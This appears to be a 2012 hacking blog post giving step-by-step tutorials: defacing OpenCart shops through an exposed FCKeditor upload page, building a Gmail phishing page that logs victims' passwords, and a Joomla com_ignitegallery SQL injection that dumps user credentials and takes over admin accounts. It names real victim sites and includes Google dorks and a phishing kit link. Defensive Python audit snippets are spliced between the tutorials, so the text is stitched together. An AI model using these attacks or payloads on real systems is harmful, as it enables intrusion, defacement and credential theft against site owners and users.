
Monday, 09 July 2012

Web defacement "powered by Aditya Newbie"

Let's get straight to it...

dork : Powered By OpenCart site:com

The "site:" value can be anything; what matters is that the site runs OpenCart.

Example target: http://www.superbikecarbonparts.com/

It also works with a target like www.target.com/patch/, that is, when the shop you find is installed under /patch/. Example: http://www.target.com/patch/

Once you have a target, append the exploit path directly.

Exploit path:
Quote:
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

So it becomes:
Example: http://www.superbikecarbonparts.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

If the target sits under /patch/, append the path after the patch directory:
Example: www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

Look at the page that comes up; it contains the file upload form.
For the connector, choose PHP.
Then upload our HTML deface file.
If it succeeds, an alert like this appears:
Code:
"file uploaded with no errors"

Check whether our file has been uploaded by clicking "Get Folders and Files".

Now look at the result.

Example result: http://www.superbikecarbonparts.com/k4ton.html

Unfortunately, the file we upload cannot overwrite an existing file; it is stored as a duplicate instead: file(1).html or file(2).html.
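For a site owner, the walkthrough above translates into two things to look for on disk: the FCKeditor connector test page left reachable inside the shop, and files stored with a "(N)" suffix after a colliding upload. The following is an added example, not code from the original post; the function names and the sample directory tree are constructed for illustration.

```python
import os
import re
import tempfile

# Directory the post requests, relative to the shop root.
CONNECTOR_DIR = "admin/view/javascript/fckeditor/editor/filemanager/connectors"
# test.html is the page named in the post; uploadtest.html ships beside it in FCKeditor 2.x.
TEST_PAGES = {"test.html", "uploadtest.html"}
# A colliding upload is stored as name(1).ext, name(2).ext, ... instead of overwriting.
DUPLICATE_RE = re.compile(r"^.+\(\d+\)\.(html?|php\d?|phtml)$", re.IGNORECASE)


def audit_webroot(webroot):
    """Return sorted (finding, relative_path) tuples for one document root."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        rel_dir = os.path.relpath(dirpath, webroot).replace(os.sep, "/")
        for name in files:
            rel = name if rel_dir == "." else f"{rel_dir}/{name}"
            if rel_dir.endswith(CONNECTOR_DIR) and name.lower() in TEST_PAGES:
                findings.append(("exposed-connector-test-page", rel))
            elif DUPLICATE_RE.match(name):
                findings.append(("duplicate-named-upload", rel))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample webroot: a shop under /store/ plus one duplicate-named file."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel in (f"store/{CONNECTOR_DIR}/test.html",
                "store/index.php",
                "store/index(1).html"):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
    return root


if __name__ == "__main__":
    for finding, path in audit_webroot(build_sample_tree()):
        print(f"{finding:30} {path}")
```

Any connector test page it reports should be deleted or placed behind the admin login, and duplicate-named files should be reviewed against the site's known content.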




Here are a lot of vulnerable sites :D

List of vulnerable websites:
Go ahead and try it, guys :D Who knows, maybe not many have been patched yet :v hehe. Don't be lazy about searching Google for other vulnerable sites :D Thanks

Phishing - Creating, uploading and using fake login pages

Sharing again =))
Before continuing, please have Google Translate ready :D

I could simply give you fake page generators or ready-made fake web pages, but I want you to create one manually yourself.

First, I should tell you the basic methodology of making a phishing page for any website. On a website where users are supposed to enter or submit data (an email address, a password or anything else), the HTML contains a piece of code called the form action. It looks like this:
<form method="POST" action="something">.
You can find it by viewing the source of the web page; right-click on the page to do so. "something" in the action field is the name or path of the file that receives the submitted data.

So the idea of a fake login page is simple. Download the web page to your computer, modify the action field so the data goes to a path of your choosing, upload the modified page to any web hosting site, and you are done. :)

I have taken Gmail as the example. Download the PHP file and the text file that will be required from http://www.ziddu.com/download/13323817/explore.rar.html. Password: explorehacking.com

Steps to make a phishing/fake login page:

1. First of all, sign up for an account at any free web hosting site such as my3gb.com, ripway.com, 110mb.com etc. I have chosen my3gb.com.

2. Go to www.gmail.com. Click the 'Save page as' option and save the complete web page. You should get an HTML file and a folder containing two images.

3. Open the HTML file in any text editor such as WordPad or Notepad. Press "Ctrl+F" to search for the word "action".

4. Replace the link in the action field with "explore.php" and save the file.

5. Go to the File Manager and upload this HTML file, hacked.txt and explore.php to your web hosting site.

Note: Create a new directory with exactly the same name as the folder that contains the images, and upload the images into that directory.

Now you can test whether it works. Visit your fake login page; it should be at http://username.my3gb.com/filename.html. Enter any username and password, and you will be redirected to the real Gmail page. The data should have been saved in hacked.txt.

Note: You can look at the code of explore.php. There is a line like header:"location: path". It is the path to which the victim is redirected after submitting data. You can change it as needed.


OK, good luck trying it, my brothers ^_^ Back to pulling my pedicab now! :P =))
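The form-action mechanism described above is also what gives a cloned login page away: its password form posts somewhere other than the real sign-in origin. The following is an added example, not part of the original post, of a check that flags such forms; the class and function names, the trusted host login.example.com and the sample markup are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormAudit(HTMLParser):
    """Collect every <form> with its action and whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(html, page_url, trusted_hosts):
    """Return resolved action URLs of password forms that leave the trusted origin."""
    parser = FormAudit()
    parser.feed(html)
    flagged = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        # A relative action such as "explore.php" resolves against the serving page.
        target = urljoin(page_url, form["action"])
        parts = urlsplit(target)
        if parts.scheme != "https" or parts.hostname not in trusted_hosts:
            flagged.append(target)
    return flagged


# Constructed sample markup: a cloned page and the legitimate page it imitates.
CLONE = '<form method="POST" action="explore.php"><input type="password" name="p"></form>'
REAL = '<form method="POST" action="/signin"><input type="password" name="p"/></form>'
```

A mail gateway or crawler can run the same check on pages reached from inbound links, with `trusted_hosts` set to the organisation's real sign-in hosts.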

Exploit Joomla

I stumbled across an exploit while browsing earlier; apologies to those who already know it, I just want to share, sharing is beautiful :D
Don't be lazy about searching Google :D

======
=step1=
======

Search Google with this dork:
inurl:"index.php option=com_ignitegallery"
======
=step2=
======

Apply the exploit. Exploit:
index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--

Example: http://www.kaikourafishing.co.nz/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype%29,4,5,6,7,8,9,10+from+jos_users--

And there the output appears :D
======
=step3=
======

Now let's try resetting the password, using this exploit: /index.php?option=com_user&view=reset

Hmm.. it asks for an email address.. just enter the admin email from earlier.. then press Enter :D
======
=step4=
======

It asks for an activation value as well; no problem, we look up the activation first :D
Exploit: index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,activation),4,5,6,7,8,9,10+from+jos_users--

See, the activation value comes out :D
======
=step5=
======

Just copy and paste it into the earlier form, then press Enter :D
======
=step6=
======

Now it asks for a new password :D
======
=step7=
======

OK, on to the next stage: now we log in to the admin panel at http://www.kaikourafishing.co.nz/administrator/
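The sequence in this post leaves a recognisable trail in web server logs: a non-numeric `gallery` value sent to com_ignitegallery, followed by a visit to the com_user reset view from the same client. The following is an added example, not part of the original post, that detects both over access-log lines; it assumes `gallery` is meant to be a plain integer ID and a combined-format log, and the sample lines, IP addresses and function name are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" \d{3}')
INT_RE = re.compile(r"^\d+$")          # assumption: a legitimate gallery id is digits only
UNION_RE = re.compile(r"union\s+(all\s+)?select", re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, shortened payload).
SAMPLE_LOG = """\
203.0.113.7 - - [09/Jul/2012:10:00:01 +0000] "GET /index.php?option=com_ignitegallery&task=view&gallery=3 HTTP/1.1" 200 5120
198.51.100.9 - - [09/Jul/2012:10:02:11 +0000] "GET /index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,3+from+jos_users-- HTTP/1.1" 200 7040
198.51.100.9 - - [09/Jul/2012:10:03:40 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 3300
192.0.2.44 - - [09/Jul/2012:10:05:00 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 3300
"""


def analyze(log_text):
    """Return (client_ip, alert) tuples in log order."""
    alerts, injectors = [], set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs URL-decodes, so "+" and %28/%29 encodings are normalised first.
        query = parse_qs(urlsplit(m["url"]).query, keep_blank_values=True)
        option = query.get("option", [""])[0]
        if option == "com_ignitegallery":
            gallery = query.get("gallery", [""])[0]
            if not INT_RE.match(gallery):
                injectors.add(m["ip"])
                kind = "sqli-union" if UNION_RE.search(gallery) else "non-integer-gallery"
                alerts.append((m["ip"], kind))
        elif option == "com_user" and query.get("view", [""])[0] == "reset":
            # A reset on its own is normal; it matters after an injection attempt.
            if m["ip"] in injectors:
                alerts.append((m["ip"], "reset-after-injection"))
    return alerts


if __name__ == "__main__":
    for ip, alert in analyze(SAMPLE_LOG):
        print(ip, alert)
```

The same integer test, applied to the parameter on the server before it reaches the query, rejects every request shown in this post.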